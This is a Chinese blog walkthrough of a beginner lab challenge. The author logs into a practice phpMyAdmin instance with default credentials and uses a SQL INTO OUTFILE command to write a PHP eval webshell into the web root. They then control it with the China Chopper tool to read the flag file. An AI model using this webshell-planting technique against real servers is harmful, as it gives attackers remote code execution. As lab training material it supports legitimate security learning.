墨者学院-入门级-phpMyAdmin后台文件包含分析溯源-小白必看(超详细)

2021年1月26日,第六次渗透测试。
实在抱歉,因为工作原因许久没有更新测试,期间生活也发生了很多事,现在心情也不怎么好,但也尽量讲细一点吧,开干!

准备需求:
1、win10系统;
2、中国菜刀;

1、进入靶场
账号:root 密码:root
这个账号密码都是看其他的教程知道的,至于怎样破解出来不知道,能力有限,过后我看看怎么来的吧。(如果了解再回来追跟);
在这里插入图片描述
2、进入到后台,到SQL页面,在控制台下输入以下命令,然后点击执行;
select ‘<?php eval($_POST[key]); ?>’ into outfile ‘/var/www/html/hacker.php’;
在这里插入图片描述
执行后的页面显示;
在这里插入图片描述
3、打开中国菜刀软件添加新的地址,下面的格式选择UTF-8,完成编辑后,进入后台;
注:地址栏不要照抄,因为每次开启靶场产生的端口号都不一样,所以按照自己的实际进行填写;
在这里插入图片描述
这是进入后的画面,可以查看到所有的配置文件;
在这里插入图片描述
还能查看到我们刚刚在sql控制台上传的后台文件,文件名:hacker.php,点击进去后看到我们输入的内容;
在这里插入图片描述
在这里插入图片描述
2 、3点结合分析:

  • 在sql命令行命令中输入的[ ]中的内容为webshell密码,与菜刀上地址栏后面的输入框对应;
  • 地址栏的后缀对应sql命令中html后面的文件名;
    在这里插入图片描述
    4、到根目录下,找到key.txt文件打开就可以看到钥匙了。
    在这里插入图片描述
    在这里插入图片描述

中国菜刀介绍:
在这里插入图片描述
从百度可以看到菜刀本来是一个网站的管理工具,但或许过于强大,后来变成了黑客的攻击工具,现在按功能说的话名字是“远程webshell工具”,网友们称为“中国菜刀”。
具体用法网上挺多的,而且操作也不难,我就不再多说。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值